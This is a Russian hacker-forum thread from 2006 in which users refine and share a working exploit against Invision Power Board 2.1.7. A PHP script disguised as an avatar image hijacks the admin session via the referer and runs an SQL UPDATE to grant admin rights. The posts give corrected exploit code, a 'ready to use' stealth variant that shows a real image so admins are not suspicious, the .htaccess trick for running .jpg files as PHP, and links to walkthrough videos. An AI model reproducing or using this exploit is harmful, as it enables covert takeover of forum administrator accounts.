 |
|
10.10.2006, 18:50
|
|
Познающий
Регистрация: 12.01.2006
Сообщений: 52
С нами:
10697574
Репутация:
140
|
|
Разобрался я с этим експлойтом, прет кук из админпанели и добавляет к нему запрос сэквел, мне понравилось 
У кого что то не получается расскажу что нужно сделать чтобы получилось
Как сделать чтобы скрыть под avatar.jpg пхп скрипт думаю ясно, но скопировав предоставленный эксплойт и даже подставив нужные значения, ничего не выйдет, там есть небольшая хитрость (может просто случайность) в строке:
Код:
header("Location: ".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+where+id%3D{$mid}+LIMIT+1");
Нужно удалить лишний знак табуляции и выровнять строку так:
l
Код:
header("Location: ".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+where+id%3D{$mid}+LIMIT+1");
Заодно предоставлю следующий вариант, чтобы у админов не вызывал подозрения не отображающийся аватар, допишем строчку в сплойт (сплойт готовый к употреблению):
Код:
<?php
$mid = 2;
if (preg_match('/(.*adsess=[\\w]{32})/', $_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{ header("Location: ".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+ibf_members+SET+posts%3D12897+WHERE+id%3D2"); }
else { header("Location: http://forum.xxx/forum/uploads/av-xx.jpg"); }
?>
Тестировочный сплойт, который станавливает юзеру с id=2 количество постов 12897, чтобы получить права админа вставляем запрос из официального сплойта
Сработает только тогда, когда админ посмотрит профиль юзера из Админпанели
p.s Если админ посмотри профиль в браузере konqueror вас ждет разочарование
Последний раз редактировалось BMaster; 10.10.2006 в 22:38..
|
|
|
14.10.2006, 03:25
|
|
Познающий
Регистрация: 31.08.2006
Сообщений: 67
С нами:
10366224
Репутация:
18
|
|
Все происходит на локалке. 
Ну я закачал обычную аватару, изменил на пхп код, смотрю админом картику... Ноль не чего, и я тута решил дожлно отображатьса инфа о пхп, и тута я поменял код... Снова ноль ! Что я тока не пробывал. Помогите, а? 
Последний раз редактировалось Nekt; 14.10.2006 в 04:03..
|
|
|
|
19.10.2006, 00:50
|
|
Познающий
Регистрация: 12.01.2006
Сообщений: 52
С нами:
10697574
Репутация:
140
|
|
Вообщем сделал видео с небольши но:
Так как не одного дельного совета не было:
http://forum.antichat.ru/threadnav17208-2-10.html
Видео на 40 мег в раре, само занимает 70 мег, идет 19 минут.
Это полная версия, и соостветственно кто хочет качает, кто не хочет не качает
Немногим позже подготовлю порезанную версию, т.е просто вырежу кадры где например у меня довольно долго рестартится сервер, из за требовательных ресурсов
xvidcap, то как набираю там текст к комментариям...
Просто останутся основные кадры, смысл не потеряется
http://rapidshare.de/files/37256566/sql_inj_ipb_2.1.7_and_early_from_BMaster_Full_vers ion.rar
в ссылке убрать пробел в слове version хз откуда он там
AVI, 1022 x 766, 7.00 fps, video: Microsoft MPEG-4 v2
p.s Видео демонстрирует уязвимость форума, который находится на localhost, и соответственно хост тоже локальный.
p.p.s имхо camstudio вроде тоже не может захватывать без кодирования, он тоже использует компрессор по дефолту microsoft video 1.
т.о если это так, то факи написаны немного не точно
Последний раз редактировалось BMaster; 19.10.2006 в 01:33..
|
|
|
|
23.10.2006, 01:25
|
|
Green member
Регистрация: 28.12.2005
Сообщений: 376
С нами:
10719686
Репутация:
1833
|
|
Вот переснял видео для деалапщиков :
_http://kolokol.ho.com.ua/video/ibp.2.1.7.rar
|
|
|
|
23.10.2006, 14:23
|
|
Познающий
Регистрация: 12.01.2006
Сообщений: 52
С нами:
10697574
Репутация:
140
|
|
Вообщем качество/размер лучше этого не могу подобрать, обрезать ничего не стал, просто пожал немного.
http://rapidshare.com/files/343881/sql_inj_ipb_2.1.7_and_early_from_BMaster_Xvid.rar
8мег.
Хостингов для помощи использования этой уязвимости много, fatal.ru тому пример, недавно тестил, все работает.
.htaccess если нет, то создаем.
|
|
|
|
24.10.2006, 16:12
|
|
Новичок
Регистрация: 20.10.2006
Сообщений: 5
С нами:
10292795
Репутация:
0
|
|
Если можно выложите файл .htacces как он должен выглядеть!
заранее спасибо.
|
|
|
|
24.10.2006, 16:27
|
|
Green member
Регистрация: 28.12.2005
Сообщений: 376
С нами:
10719686
Репутация:
1833
|
|
Сообщение от Konstant!n
Если можно выложите файл .htacces как он должен выглядеть!
заранее спасибо.
в .htaccess добавить
<Files "u.jpg">
AddType application/x-httpd-php .jpg
</Files>
|
|
|
|
26.10.2006, 16:24
|
|
Познающий
Регистрация: 12.01.2006
Сообщений: 52
С нами:
10697574
Репутация:
140
|
|
Вы о чем?
Н чужом хосте отредактировать файл .htaccess можно запросто, если ты зарегистрировал свой сайт на предоставляющем тебе хостинг сайте
А если не зарегистрировал то конечно никак не отредактируешь
Если кто так и не понял... НЕ На форуме, который вы хотите протестировать/хакнуть, НЕ на сервере на котором находится этот форум НИЧЕГО создавать, редактировать кроме как профиля своего юзера НЕ нужно.
Ищите в нете хостинг платный/бесплатный/поднимаете свой/... который поддерживает php и где есть поддержка .htaccess файлов...
Пример для незнающих fatal.ru и все, больше ничего не нужно. |
|
|
|
26.10.2006, 21:37
|
|
Green member
Регистрация: 28.12.2005
Сообщений: 376
С нами:
10719686
Репутация:
1833
|
|
Некотрые регят себе сайт на хостинге бесплатном при этом незная что за такой файлик : .htaccess
|
|
|
|
26.10.2006, 21:51
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами:
10467686
Репутация:
930
|
|
Сообщение от _-[A.M.D]HiM@S-_
Некотрые регят себе сайт на хостинге бесплатном при этом незная что за такой файлик : .htaccess
.htaccess – это файл, который дает возможность конфигурировать работу сервера в отдельных директориях (папках), не предоставляя доступа к главному конфигурационному файлу. Например, устанавливать права доступа к файлам в директории, менять названия индексных файлов, самостоятельно обрабатывать ошибки Apache, перенаправляя посетителей на специальные страницы ошибок.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для _-[A.M.D]HiM@S-_](/avatars/avatar21104.jpg?210364){kind=avatar}
![Аватар для _-[A.M.D]HiM@S-_](/avatars/avatar21104.jpg?211107){kind=avatar}
![Аватар для _-[A.M.D]HiM@S-_](/avatars/avatar21104.jpg?212430){kind=avatar}
Линейный вид
